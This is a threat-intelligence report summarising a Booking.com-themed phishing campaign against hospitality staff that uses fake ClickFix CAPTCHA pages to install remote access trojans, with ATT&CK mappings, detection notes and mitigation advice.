Full Report
A phishing campaign spoofing Booking.com has been observed targeting hospitality sector, using ClickFix to install malware
Analysis Summary
# Tool/Technique: ClickFix CAPTCHA System (Delivery Mechanism)
## Overview
The ClickFix system is being leveraged within a phishing campaign impersonating Booking.com to trick hospitality industry personnel into executing malicious scripts on Windows devices, resulting in malware installation, primarily Remote Access Trojans (RATs).
## Technical Details
- Type: Technique (Social Engineering/Delivery Mechanism framing an attack)
- Platform: Windows devices
- Capabilities: Deceptively prompts victims to complete "verification steps" via a counterfeit CAPTCHA page, which involves copying and executing a script via Windows shortcuts to deploy malware.
- First Seen: Active since November 2024, peaking in March 2025.
## MITRE ATT&CK Mapping
* T1566 - Phishing
- T1566.001 - Spearphishing Attachment
- T1566.002 - Spearphishing Link
* T1204 - User Execution
- T1204.002 - Included Defenses: Malicious File
* T1059 - Command and Scripting Interpreter
- T1059.003 - Windows Command Shell (Implied by executing scripts via shortcuts)
## Functionality
### Core Capabilities
- Social engineering via emails spoofing Booking.com reservation/guest issue requests.
- Hosting a deceptive CAPTCHA page (ClickFix) designed to bypass user caution.
- Coercing users into actively executing malicious code via Windows shortcuts.
### Advanced Features
- The mechanism focuses on achieving execution by framing the final step as a necessary, non-suspicious "verification" rather than a direct download/execution prompt.
## Indicators of Compromise
- File Hashes: [None provided in the context]
- File Names: [None provided in the context]
- Registry Keys: [None provided in the context]
- Network Indicators: [No specific C2 or initial delivery domains/IPs provided in the context]
- Behavioral Indicators: User interaction involving copying and executing scripts initiated from a Windows shortcut following interaction with a CAPTCHA link.
## Associated Threat Actors
- Threat actors using this specific campaign variation are noted by Cofense Intelligence, but a named APT or established cybercrime group is not specified in the provided text.
## Detection Methods
- Signature-based detection: [Not specified for the specific delivery script, but payloads are detectable]
- Behavioral detection: Monitoring for unusual script execution initiated immediately after user interaction with links related to booking platforms, particularly when involving Windows shortcuts.
- YARA rules: [Not specified in the context]
## Mitigation Strategies
- Prevention measures: Strict user training regarding unsolicited emails, especially those related to critical business applications like reservation confirmations or guest interactions.
- Hardening recommendations: Implement application control to restrict the execution of scripts or compiled binaries originating from unusual paths or user actions, especially via interactive shortcuts.
## Related Tools/Techniques
- XWorm RAT (Common payload)
- Pure Logs Stealer (Common payload)
- DanaBot (Common payload)